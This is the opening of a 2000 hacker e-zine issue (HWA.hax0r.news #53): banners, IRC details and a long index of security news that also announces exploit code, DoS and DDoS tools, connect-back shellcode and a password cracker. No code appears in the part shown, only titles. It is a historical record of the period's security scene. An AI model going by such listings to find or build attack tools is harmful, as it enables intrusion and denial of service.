[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA 2000=] Number 53 Volume 2 Issue 5 1999 April-May 2000 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== = "ABUSUS NON TOLLIT USUM" = ========================================================================== jesi li cuo vjesti ? Editor: Cruciphux (cruciphux@dok.org) A Hackers Without Attitudes Production. (c) 1999, 2000 http://welcome.to/HWA.hax0r.news/ http://hwa-security.net/ Site is live, grand opening coming soon! *** NEW WEB BOARD NOW ACTIVE *** http://discserver.snap.com/Indices/103991.html ========================================================================== = = = ____ = = / ___|_____ _____ _ __ __ _ __ _ ___ = = | | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \ = = | |__| (_) \ V / __/ | | (_| | (_| | __/ = = \____\___/ \_/ \___|_| \__,_|\__, |\___| = = |___/ = = = = = This is #53 covering April 10th to May 7th, 2000 = See words from Editor on note about this issue and #54 = = = = ** 636 People are on the email notify list as of this writing. = = = = = = see note below in the Help Out! section re:distribution. = = = = = = = ========================================================================== _ _ _ ___ _ _ | | | | ___| |_ __ / _ \ _ _| |_| | | |_| |/ _ \ | '_ \| | | | | | | __| | | _ | __/ | |_) | |_| | |_| | |_|_| |_| |_|\___|_| .__/ \___/ \__,_|\__(_) |_| If you'd like to help there are many things you can do, for full details mail me and i'll send you a file of suggestions and jobs that need to be handled. You can choose what you want to do, in your email you may want to mention if you are interested or have experience in areas such as: * cgi programming * php programming * file archive maintainance * message forum moderator * news article collector <- We can never have enough of these! * mailing list monitoring * watch for and report interesting updates on selected web sites Plus others. @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ # # @ The HWA website is sponsored by CUBESOFT communications I highly @ # recommend you consider these people for your web hosting needs, # @ @ # Web site sponsored by CUBESOFT networks http://www.csoft.net # @ check them out for great fast web hosting! @ # # # http://www.csoft.net/~hwa @ @ # @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ____ _ / ___| _ _ _ __ ___ _ __ ___(_)___ \___ \| | | | '_ \ / _ \| '_ \/ __| / __| ___) | |_| | | | | (_) | |_) \__ \ \__ \ |____/ \__, |_| |_|\___/| .__/|___/_|___/ |___/ |_| SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... =-----------------------------------------------------------------------= "If live is a waste of time and time is a waste of life, then lets all get wasted and have the time of our lives" - kf ____| _| | __| | __ \ _ \ __| | __| | | __/ | _____|_| _| _|\___|\__| Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news ************************************************************************** *** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed *** *** *** *** please join to discuss or impart news on the zine and around the *** *** scene or just to hang out, we get some interesting visitors you *** *** could be one of em. *** *** *** *** Note that the channel isn't there to entertain you its purpose is *** *** to bring together people interested and involved in the underground*** *** to chat about current and recent events etc, do drop in to talk or *** *** hangout. Also if you want to promo your site or send in news tips *** *** its the place to be, just remember we're not #hack or #chatzone... *** ************************************************************************** =--------------------------------------------------------------------------= _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] HWA.hax0r.news #53 Apr/May 2000 =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. LEGAL & COPYRIGHTS .............................................. 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. THIS IS WHO WE ARE .............................................. ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Source Keys HWA.hax0r.news 2000 =--------------------------------------------------------------------------= "The three most dangerous things in the world are a programmer with a soldering iron, a hardware type with a program patch and a user with an idea." - Unknown [MM] - Articles from Mass Media sources (Wired MSNBC Reuters etc) [IND] - Independant articles or unsolicited material. [HWA] - Articles or interviews by HWA Staff members [HNN] - Sourced from the Hacker News Network http://www.hackernews.com/ [HNS] - Sourced from Help Net Security http://net-security.org/ [403] - Sourced from 403-security http://www.403-security.net/ [ISN] - Articles from the ISN Mailing list (usually sourced from media) [b0f] - Buffer Overflow Security release http://b0f.freebsd.lublin.pl/ [zsh] - ZSH release http://zsh.interniq.org/ [COR] - Correction to previous release. =--------------------------------------------------------------------------= Key Content HWA.hax0r.news 2000 =--------------------------------------------------------------------------= only a poor workman blames his tools, unless of course those tools were written by Microsoft :) lol 01.0 .. GREETS ........................................................... 01.1 .. Last minute stuff, rumours, newsbytes ............................ 01.2 .. Mailbag .......................................................... 02.0 .. From the Editor................................................... 03.0 .. [IND]Hacking your way into a girlie's heart, etc by: ch1ckie..... 04.0 .. [HWA]Apr 12th:MPAA Site DoS'd off the net.............................. 05.0 .. [b0f]Common WWW and CGI vulnerabilities list ...................... 06.0 .. [IND]Project Gamma interviews SpaceRogue of HNN........................ 07.0 .. [MM] MS Engineers plant secret anti-Netscape password ................. 08.0 .. [b0f]Omni HTTPD Pro v2.06 for Win9x and NT DoS..................... 09.0 .. [MM]Judge bans Mitnick from taking part in tech conference ........... 10.0 .. [MM]The continuing saga of MAFIABOY king lemur of DDoS................ 10.1 .. [MM]Mafiaboy reaction: "yeah right"................................... 10.2 .. [MM]Mafiaboy's dad gets busted for conspiracy ........................ 10.3 .. [MM]On another mafiaboy note, a new site has popped up on Geocities... 10.4 .. [MM]Mafiaboy:Probe of Hacker Nets a Second Suspect: His Father ....... 10.5 .. [MM]Mafiaboy:The Challenge of Fighting Cybercrime (Reno).............. 10.6 .. [MM]Mafiaboy:Janet Reno licks chops over Mafiaboy arrest.............. 10.7 .. [MM]Mafiaboy:IS MAFIABOY REAL OR A CREATION OF THE MEDIA? ............ 10.8 .. [MM]Mafiaboy:Canadian Feds charge Mafiaboy in DDoS attacks............ 10.9 .. [MM]Mafiaboy:Canadian Teen Charged in Web Blitz....................... 11.0 .. [MM]Mafiaboy:Canada Arrests 'Mafiaboy' Hacker, Aged 15 ............... 11.1 .. [MM]Mafiaboy:Canadian Arrest Made in February Web Attacks ............ 11.2 .. [MM]Mafiaboy:Reno Says 'Mafiaboy' Hacker Must Face Punishment ........ 11.3 .. [MM]Mafiaboy:FBI Has Evidence That He and Others Launched Web Attacks. 11.4 .. [MM]Mafiaboy:Hacker cripples Area 51 site for 36 hours................ 12.0 .. [ISN]Mafiaboy:Dispelling some myths, did he really hack? etc.......... 13.0 .. [MM]Cybercrime Solution Has Bugs ..................................... 14.0 ,, [IND]The new spank.c DoS tool source and an analysis paper by 1st..... 15.0 .. [IND] RFParalyse.c:Cause undesired effects remotely against Win9x..... 16.0 .. [MM] New worm: ILOVEYOU spreads via e-mail attachments................ 17.0 .. [HWA] May 4th 2000: SugarKing interviews ph33r the b33r............... 18.0 .. [SEC] Security Bulletins Digest May 02nd 2000......................... 19.0 .. [b0f] Latest releases from Buffer Overflow Security................... 20.0 .. [HWA] Informal chat/interview with Mixter ............................ 21.0 .. [b0f] b0f3-ncurses.txt FBSD 3.4 libncurses buffer overflow by venglin. 22.0 .. [b0f] b0f2-NetOp.txt NetOp, Bypass of NT Security to retrieve files .. 23.0 .. [b0f] b0f1-Mailtraq.txt Mailtraq remote file retriving ............... 24.0 .. [b0f] Exploit/DoS /makes Timbuktu Pro 2.0b650 stop responding ........ 25.0 .. [b0f] ides.c:'Intrusion Detection Evasion System'..................... 26.0 .. [b0f] lscan2.c Lamerz Scan, a small fork()ing scanner................. 27.0 .. [b0f] Pseudo Cryptographic Filesystem................................. 28.0 .. [b0f] mtr-0.41 (freebsd) local root exploit........................... 29.0 .. [b0f] shellcode that connets to a host&port and starts a shell........ 30.0 .. [b0f] NT Security check paper part 2 by Slash......................... 31.0 .. [IND] The apache.org hack. by {} and Hardbeat (Apr 4th 2000).......... 32.0 .. [IND] The Goat Files: mindphasr talks more about his bust............. 33.0 .. [IND] The Goat Files: "Hackers unite - a goat security expose"........ 34.0 .. [MM] Napster boots 317,377 users...................................... 35.0 .. [MM] ytcracker busted for web defacement.............................. 36.0 .. [HNN] Junger wins in Appeals Court-Code Declared Speech .............. 37.0 .. [HNN] Bullet to Scan Hard Drives of Web Site Visitors ................ 38.0 .. [HNN] Links to Web Sites Illegal...................................... 39.0 .. [HNN] British Companies Complacent ................................... 40.0 .. [HNN] Trio Becomes First Internet Crime Conviction for Hong Kong ..... 41.0 .. [HNN] Census Afraid of Electronic Intrusion .......................... 42.0 .. [HNN] Hardware Key Logger Introduced ................................. 43.0 .. [HNN] Napalm Issue 4 ................................................. 44.0 .. [HNN] EU Set To Rewrite Human Rights ................................. 45.0 .. [HNN] Dutch Want Their Own Echelon ................................... 46.0 .. [HNN] SPAM Goes Wireless ............................................. 47.0 .. [HNN] Forget Fort Knox Now It's Fort Net ............................. 48.0 .. [HNN] TrustedBSD Announced ........................................... 49.0 .. [HNN] 690,000 Illegal Web Pages on the Net ........................... 50.0 .. [HNN] Attacking the Attackers ........................................ 51.0 .. [HNN] More EZines Released ........................................... 51.1 .. [IND] HYPE - w00w00 zine.............................................. 52.0 .. [HNN] Max Vision Goes to Court ....................................... 53.0 .. [HNN] Mitnick On the Corporate Conference Circuit .................... 54.0 .. [HNN] AOL Liable for Music Piracy .................................... 55.0 .. [HNN] Canadian ISP Reveals Credit Card Numbers ....................... 56.0 .. [HNN] Vatis Concerned About Spoofing ................................. 57.0 .. [HNN] L0pht Releases CRYPTOCard Vulnerabilities ...................... 58.0 .. [HNN] Phone Company's Announce Security Initiative ................... 59.0 .. [HNN] Microsoft Admits to Backdoor in Server Software ................ 60.0 .. [HNN] Backdoor Found in E-Commerce Software .......................... 61.0 .. [HNN] MostHateD Pleads Guilty ........................................ 62.0 .. [HNN] NSA And CIA Deny Echelon is Used Domestically .................. 63.0 .. [HNN] Keyboard Monitoring Becoming More Popular with Business ........ 64.0 .. [HNN] Japanese Cult Wrote Software for Navy .......................... 65.0 .. [HNN] MPAA Suspects Denial of Service Attack ......................... 66.0 .. [HNN] Even More E-zines .............................................. 67.0 .. [HNN] BackDoor Now Called a Bug ...................................... 68.0 .. [HNN] North Carolina Plagued by 'hackers' ............................ 69.0 .. [HNN] Web Sites Redirected, Serbians Blamed .......................... 70.0 .. [HNN] Metallica Sues Napster, Gets Web Site Defaced .................. 71.0 .. [HNN] Japan To Control PS Exports, Fears Weapon Use .................. 72.0 .. [HNN] Spy Laptop Goes Missing ........................................ 73.0 .. [HNN] Napster Users May Get Jail ..................................... 74.0 .. [HNN] Brazil Tax Records on the Loose ................................ 75.0 .. [HNN] SingNet Suffers Abuse From Overseas ............................ 76.0 .. [HNN] Attrition Graphs ............................................... 77.0 .. [HNN] Wide Open Source ............................................... 78.0 .. [HNN] Mafiaboy Charged for DDoS Attacks .............................. 79.0 .. [HNN] TerraServer Downtime Blamed on Malicious Activity .............. 80.0 .. [HNN] Ranum To Receives Clue Award ................................... 81.0 .. [HNN] Ireland Eases Restrictions on Encryption Export Procedures ..... 82.0 .. [HNN] Web Defacement Supports Separatists ............................ 83.0 .. [HNN] Exploits Protected by Copyright ................................ 84.0 .. [HNN] The Erosion of Privacy on the Net .............................. 85.0 .. [HNN] MafiaBoy Released on Bail ...................................... 86.0 .. [HNN] Mitnick Banned from Speaking ................................... 87.0 .. [HNN] Top Politicos Meet to Discuss Infrastructure Security .......... 88.0 .. [HNN] NSF To Issue Grants for Security Schooling ..................... 89.0 .. [HNN] CalPoly Charges Student with Port Scanning ..................... 90.0 .. [HNN] Encrypted Sheet Music Available on Net Soon .................... 91.0 .. [HNN] ISPs Still Vulnerable to SNMP Holes ............................ 92.0 .. [HNN] Internet Security Act of 2000 .................................. 93.0 .. [HNN] PSINet Hit with DoS Attack ..................................... 94.0 .. [HNN] Satellite Jammer Plans on Net .................................. 95.0 .. [HNN] GNIT Vulnerability Scanner Released ............................ 96.0 .. [HNN] Free MafiaBoy .................................................. 97.0 .. [HNN] MafiaBoy News Roundup .......................................... 98.0 .. [HNN] Members of HV2k Raided ......................................... 99.0 .. [HNN] Piracy Legal In Italy, Sort of ................................. 100.0 .. [HNN] Palm VII Considered Security Threat ............................ 101.0 .. [HNN] Navy Intranet National Security Risk? .......................... 102.0 .. [HNN] Mitnick Upset Over Claims Made by UITA ......................... 103.0 .. [HNN] Holiday Message from Disney Leaked ............................. 104.0 .. [HNN] Attrition Updates Mailing List ................................. 105.0 .. [HNN] MafiaBoy's Friends Under Investigation ......................... 106.0 .. [HNN] Backdoor Found in Redhat ....................................... 107.0 .. [HNN] USC Stands Their Ground ........................................ 108.0 .. [HNN] Critics Chide COPPA - Disney Plan Criticized ................... 109.0 .. [HNN] Happy CIH Virus Day ............................................ 110.0 .. [HNN] AboveNet Hit with DDoS ......................................... 111.0 .. [HNN] Thailand Has No Software Industry Due To Piracy ................ 112.0 .. [HNN] War Plans Found on Net ......................................... 113.0 .. [HNN] India May get New Cyber Laws ................................... 114.0 .. [HNN] Napster Backs 'Bizkit .......................................... 115.0 .. [HNN] Dr. Dre Sues Students for Napster Use .......................... 116.0 .. [HNN] Chernobyl Hits South Korea ..................................... 117.0 .. [HNN] Russian Gas Supplier Invaded by Cyber Criminals ................ 118.0 .. [HNN] G8 Plans Cyber Security Conference ............................. 119.0 .. [HNN] Cyber Crime Institute Established .............................. 120.0 .. [HNN] Domain Lock Down Launched ...................................... 121.0 .. [HNN] Backdoor Found in Shopping Cart Software ....................... 122.0 .. [HNN] FBI Investigating AboveNet DoS ................................. 123.0 .. [HNN] Intel Removes ID Feature From New Chips ........................ 124.0 .. [HNN] Another HotMail Hole Patched ................................... 125.0 .. [HNN] Iron Feather Collection at Risk ................................ 126.0 .. [HNN] Rubicon This Weekend, H2K Announcement ......................... 127.0 .. [HNN] Laptop Issues Justice in Brazil ................................ 128.0 .. [HNN] CCPA and ECPA not Applicable ................................... 129.0 .. [HNN] McAfee Redefines Trojan ........................................ 130.0 .. [HNN] Mitnick Back in Court .......................................... 131.0 .. [HNN] MI5 To Build Email Eavesdropping Center ........................ 132.0 .. [HNN] French ISP Wannado Vulnerable .................................. 133.0 .. [HNN] Russia Arrests 55 in Credit Card Scheme ........................ 134.0 .. [HNN] BTopenworld Suffers Information Leakage ........................ 135.0 .. [HNN] Nmap 2.5 Released .............................................. 136.0 .. [HNN] Washington State Announces CLEW Agreement ...................... 137.0 .. [HNN] New York Times Links to DeCSS .................................. 138.0 .. [HNN] More E-zines ................................................... 139.0 .. [HNN] mStream Joins Trinoo, TFN and Stacheldraht ..................... 140.0 .. [HNN] Phrack 56 Released ............................................. 141.0 .. [HNN] Tech Crimes Get Double Sentences ............................... 142.0 .. [HNN] Numbers Numbers Who has the Numbers ............................ 143.0 .. [HNN] Password Thief in Hong Kong Behind Bars ........................ 144.0 .. [HNN] FMA and SM Release CD .......................................... 145.0 .. [HNN] Metallica Claims It has 300,000 Individual Names of Napster Users 146.0 .. [HNN] President Sets GPS to Full Force ............................... 147.0 .. [HNN] New Cyber Crime Treaty Making the Rounds ....................... 148.0 .. [HNN] Vulnerabilities Found in FileMaker ............................. 149.0 .. [HNN] Internet Threat gets Four Months ............................... 150.0 .. [HNN] Dissemination of Pager Traffic Not Needed For Violation of Law . 151.0 .. [HNN] 2600 Secures Big Time Lawyer ................................... 152.0 .. [HNN] Virus Says 'I Love You' ........................................ 153.0 .. [HNN] Quake III Flaw Leaves Users Vulnerable ......................... 154.0 .. [HNN] Phone Taps on the Rise ......................................... 155.0 .. [HNN] Minors Loose Rights In Georgia ................................. 156.0 .. [HNN] 'I Love You' ................................................... 157.0 .. [HNN] Microsoft Employee Busted for Piracy ........................... 158.0 .. [HNN] Cisco Insider Convicted of Stealing PIX Source ................. 159.0 .. [HNN] British Plan to Monitor Net .................................... 160.0 .. [HNN] MPAA Tries to Ban 2600 Lawyer .................................. 161.0 .. [HNN] Apache.org Defaced ............................................. 162.0 .. [HNN] Voice Security on the Cheap .................................... 163.0 .. [HNN] Takedown Reviewed .............................................. 164.0 .. [HNS] Apr 8:NEW KIND OF SECURITY SCANNER.............................. 165.0 .. [HNS] April 8:WAYS TO ATTACK.......................................... 166.0 .. [HNS] April 7:STOLEN ACCOUNTS......................................... 167.0 .. [HNS] April 7:JAILED FOR SIX MONTHS................................... 168.0 .. [HNS] April 7: PcANYWHERE WEAK PASSWORD ENCRYPTION.................... 169.0 .. [HNS] April 7: NET PRIVACY TOOLS...................................... 170.0 .. [HNS] April 7:SECURITY ADDITIONS...................................... 171.0 .. [HNS] April 7:COOKIES................................................. 172.0 .. [HNS] April 7:SECURE E-MAIL SERVICE................................... 173.0 .. [HNS] April 7:ONLINE MUGGERS.......................................... 174.0 .. [HNS] April 6:SURVEY BY DTI........................................... 175.0 .. [HNS] April 6: COMPUTER CODES PROTECTED............................... 176.0 .. [HNS] April 6: RELEASED AFTER CODE MACHINE THEFT...................... 177.0 .. [HNS] April 6:CYBERPATROL BLOCK LIST.................................. 178.0 .. [HNS] April 5:CRYPTO REGULATIONS...................................... 179.0 .. [HNS] April 5:GFI AND NORMAN TEAM UP.................................. 180.0 .. [HNS] April 5:MASTERCARD OFFER VIRUS REPAIR SERVICE................... 181.0 .. [HNS] April 5: BUFFER OVERFLOWS....................................... 182.0 .. [HNS] April 5: PIRACY................................................. 183.0 .. [HNS] April 5:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER.................... 184.0 .. [HNS]: April 5:GROUP APPEALS DVD CRYPTO INJUNCTION.................... 185.0 .. [HNS] April 5: VIRUS BLOWS A HOLE IN NATO'S SECURITY.................. 186.0 .. [HNS] April 4: FIGHT SPAM WITH SPAM................................... 187.0 .. [HNS] April 4:REALPLAYER BUFFER OVERFLOW.............................. 188.0 .. [HNS] May 31st:NO PROBLEMS?........................................... 189.0 .. [HNS] May 31:MS SECURITY BULLETIN #38................................. 190.0 .. [HNS] May 31: BURGLAR ALARM CATCHES ATTACKERS ON THE NET.............. 191.0 .. [HNS] May 31: SENATE EYES GUARD FOR INFO SECURITY..................... 192.0 .. [HNS] May 31: TURBOLINUX SECURITY ANNOUNCEMENT........................ 193.0 .. [HNS] May 31:NAI ON VBS FIREBURN WORM................................ 194.0 .. [HNS] May 31:INTERNET GUARD DOG PRO................................... 195.0 .. [HNS] May 31: FRANK VAN VLIET INTERVIEW............................... 196.0 .. [HNS] May 31: MISSING FILES........................................... 197.0 .. [HNS] May 31: THE MYTH OF OPEN SOURCE SECURITY........................ 198.0 .. [HNS] May 31:INFORMATION SHARING MECHANISM............................ 199.0 .. [HNS] May 31:WAP RELATED DEFACEMENT................................... 200.0 .. [HNS] May 31:RUNNING A BSD-BASED FIREWALL............................. 201.0 .. [HNS] May 24:LAPTOPS STOLEN FROM PARLIAMENT........................... 202.0 .. [HNS] May 24: MICROSOFT PROGRAMS VULNERABLE TO VIRUSES................ 203.0 .. [HNS] May 24:INTRUSION DETECTION ON LINUX............................. 204.0 .. [HNS] May 24:CRACKED! PART 3: HUNTING THE HUNTER...................... 205.0 .. [HNS] May 24: THE NEXT GENERATION OF ILOVEYOU:THE PORN WORM........... 206.0 .. [HNS] May 23:PAPERS SENT TO PROSECUTOROS.............................. 207.0 .. [HNS] May 23:INFOEXPRESS AND NETWORK UTIL. AGREEMENT.................. 208.0 .. [HNS] May 23:FREE EXPORT OF ENCRYPTION SOFTWARE....................... 209.0 .. [HNS] May 23:NAI GAUNTLET FIREWALL VULNERABILITY...................... 210.0 .. [HNS] May 22: CISCO SECURE PIX FIREWALL PROBLEMS...................... 211.0 .. [HNS] May 22:INDIA AND CYBER CRIME.................................... 212.0 .. [IND] CERT® Advisory CA-2000-05 NS Improper SSL validation............ 213.0 .. [MM] IBM will only hire immitation hackers............................ 214.0 .. [IND] BUGTRAQ: "Vulnerability statistics database".................... 215.0 .. [MM] Big Brother has your file........................................ 216.0 .. [MM] Napster gets tough with Metallica................................ 217.0 .. [IND] The Slashdot DDoS attack: What happened?........................ 218.0 .. [IND] China Executes Bank Manager for Computer Crime.................. 219.0 .. [IND] Data Transmission Pioneer Passes Away........................... 220.0 .. [IND] Canada Agrees to Drop Big Brother Files........................ 221.0 .. [IND] Senate Bill Will Make Minor Computer Hacking a Felony........... 222.0 .. [IND] McAfee considers Netbus pro legitimate tool..................... 223.0 .. [HWA] The Hoax "When hackers get bored..."............................ 224.0 .. [IND] XFree86 3.3.6 buffer overflow to root compromise................ 225.0 .. [MM] Power your PC with a potato!..................................... 226.0 .. [MM] Mobile phones fertile for E-bugs................................. 227.0 .. [MM] The virtual threat............................................... 228.0 .. [b0f] Qpopper exploit code............................................ 229.0 .. [b0f] Wingate advisory................................................ 230.0 .. [b0f] ILOVEYOU Virus analysis and removal............................. 231.0 .. [IND] Intrusion detection on Linux.................................... 232.0 .. [IND] scan.txt Spitzner gets an unusual scan.......................... 233.0 .. [IND] local ssh 1.2.27 dos attack..................................... 234.0 .. [IND] ascend router remote exploit by loneguard....................... 235.0 .. [IND] ascend router remote dos exploit by rfp......................... 236.0 .. [IND] citrix router local exploit by dug song......................... 237.0 .. [IND] ascend router remote dos attack by msg.net...................... 238.0 .. [IND] cisco/ascend router remote exploit. posted by mixter............ 239.0 .. [IND] remote ssh 1.2.27 remote overflow by Core SDI SA................ 240.0 .. [IND] '0-day' jolt2.c poc code........................................ 241.0 .. [IND] cisco remote dos attack......................................... 242.0 .. [IND] linux local misc overflow by jim paris.......................... 243.0 .. [IND] linux remote misc overflow by noir.............................. 244.0 .. [IND] linux remote misc overflow by jim paris......................... 245.0 .. [IND] ascend remote dos attack........................................ 246.0 .. [IND] ftp-ozone.c cisco remote bug by dug song........................ 247.0 .. [IND] reset_state.c cisco remote dos attack by vortexia............... 248.0 .. [IND] ftpexp.c (Version 6.2/Linux-0.10) ftpd overflow by digit........ 249.0 .. [IND] killsentry.c linux/misc remote port sentry killer by vortexia... 250.0 .. [IND] xsol-x.c mandrake 7.0 local overflow by lwc..................... 251.0 .. [IND] klogind.c bsdi 4.0.1 remote overflow by duke.................... 252.0 .. [IND] pmcrash.c router/livingston remote dos attack................... 253.0 .. [IND] cisco-connect.c cisco dos attack by tiz.telesup................. 254.0 .. [IND] ascend.c ascend remote dos attack by the posse.................. 255.0 .. [IND] ciscocrack.c / ciscocrack.pl cisco password cracker............. 256.0 .. [IND] l0phtl0phe-kid.c remote linux misc overflow by scut/teso........ 257.0 .. [IND] RFPickaxe.pl winnt remote exploit............................... 258.0 .. [IND] cproxy.c winnt remote dos attack by |[TDP]|..................... 259.0 .. [IND] fdmnt-smash2.c slackware 7.0 local exploit by Scrippie.......... 260.0 .. [IND] nis-spoof.c remote rpc exploit.................................. 261.0 .. [IND] bugzilla.pl remote cgi exploit by karin........................ 262.0 .. [IND] netsol.c remote cgi exploit by bansh33......................... 263.0 .. [IND] napstir.c remote linux misc exploit by S....................... 264.0 .. [IND] SSG-arp.c aix 4.1 local overflow by cripto..................... 265.0 .. [IND] warftpd.c win95 remote dos attack by eth0...................... 266.0 .. [IND] sniffit.c remote linux misc overflow by fusys.................. 267.0 .. [IND] pam_console.c redhat (6.2/6.1/6.0) local exploit............... 268.0 .. [IND] routedsex.c slackware 7 remote dos attack by xt................ 269.0 .. [IND] omni-httpd.sh win98 remote dos attack by sirius................ 270.0 .. [IND] RFParalyze.c win(95/98) remote dos attack by rfp............... 271.0 .. [IND] www.c novel (4.11/4.1) remote dos attack by venglin........... 272.0 .. [IND] elm-smash.c slackware 4.0 local overflow by Scrippie........... 273.0 .. [IND] ADMDNews.zip win(nt/2k) remote overflow by ADM................. 274.0 .. [IND] netprex.c Solaris (2.6/7) local overflow by cheez whiz.(fixed). 275.0 .. [IND] gnomelib.sh suse (6.4/6.3) local overflow by bladi & almudena.. 276.0 .. [IND] piranha remote redhat 6.2 exploit.............................. 277.0 .. [IND] xdnewsweb.pl remote cgi exploit by djhd........................ 278.0 .. [IND] nslookup.c local linux misc overflow by lore................... 279.0 .. [IND] syslogd.c local linux misc dos attack by lore. ................ 280.0 .. [IND] 3man.c local redhat 6.1 overflow by kil3r of lam3rz............ 281.0 .. [IND] (linux)Mail[8.1] local buffer overflow, by v9.................. 282.0 .. [ISN] How to hack a bank............................................. 283.0 .. [ISN] Spain hackers sabotage museum site............................. 284.0 .. [ISN] Hackers: Cyber saviours or snake-oil salesmen?................. 285.0 .. [ISN] U.S to beef up Cyber Defenses.................................. 286.0 .. [ISN] Javascript-in-cookies Netscape hole + MS hole.................. 287.0 .. [ISN] Intel plans to giveaway security software via web.............. 288.0 .. [ISN] Companies boosting security for web sites...................... 289.0 .. [ISN] Price Waterhouse Coopers tackles web security.................. 290.0 .. [ISN] Hackers, cybercops, continue cat-and-mouse game................ 291.0 .. [ISN] Navy intranet a security threat?............................... 292.0 .. [ISN] Hackers break into Romanian senate's web site.................. 293.0 .. [ISN] FBI investigating new web attack............................... 294.0 .. [ISN] Backdoor exposes credit cards.................................. 295.0 .. [ISN] Qualcomm warns of Eudora security hole......................... 296.0 .. [ISN] Infamous computer hacker under fire............................ 297.0 .. [ISN] Palm VII banned from lab as security threat.................... 298.0 .. [ISN] What firewalls will look like in 2003.......................... 299.0 .. [ISN] Mitnick reacts to speaking ban................................. 300.0 .. [ISN] RealNetworks patches video server vulnerability................ 301.0 .. [ISN] Group behaviour and security................................... 302.0 .. [ISN] Record encryption puzzle cracked............................... 303.0 .. [ISN] Expert warns of powerful new hacker tool....................... 304.0 .. [IND] mstream source and analysis.................................... 305.0 .. [ISN] CRYPTO-GRAM Newsletter April 15th 2000......................... 306.0 .. [ISN] Suspected hackers arrested in Russian credit card fraud........ 307.0 .. [ISN] Microsoft zaps Hotmail password bug............................ 308.0 .. [ISN] Cybercrime solution has bugs................................... 309.0 .. [ISN] Government plans computer lock-down............................ 310.0 .. [HWA] phonic dumps on hack.co.za and gov-boi ....................... 311.0 .. [IND] IP Sniffing and Spoofing....................................... =-------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in.ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Ha.Ha .. Humour and puzzles ............................................ Oi! laddie! send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... * COMMON TROJAN PORTS LISTING..................................... A.1 .. PHACVW linx and references...................................... A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site) A.3 ,, Mirror Sites list............................................... A.4 .. The Hacker's Ethic 90's Style.................................. A.5 .. Sources........................................................ A.6 .. Resources...................................................... A.7 .. Submission information......................................... A.8 .. Mailing lists information...................................... A.9 .. Whats in a name? why HWA.hax0r.news??.......................... A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again). A.11 .. Underground and (security?) Zines.............................. * Feb 2000 moved opening data to appendices, A.2 through A.10, probably more to be added. Quicker to get to the news, and info etc... - Ed =--------------------------------------------------------------------------= @HWA'99, 2000 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ | | ___ __ _ __ _| | | | / _ \/ _` |/ _` | | | |__| __/ (_| | (_| | | |_____\___|\__, |\__,_|_| |___/ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL 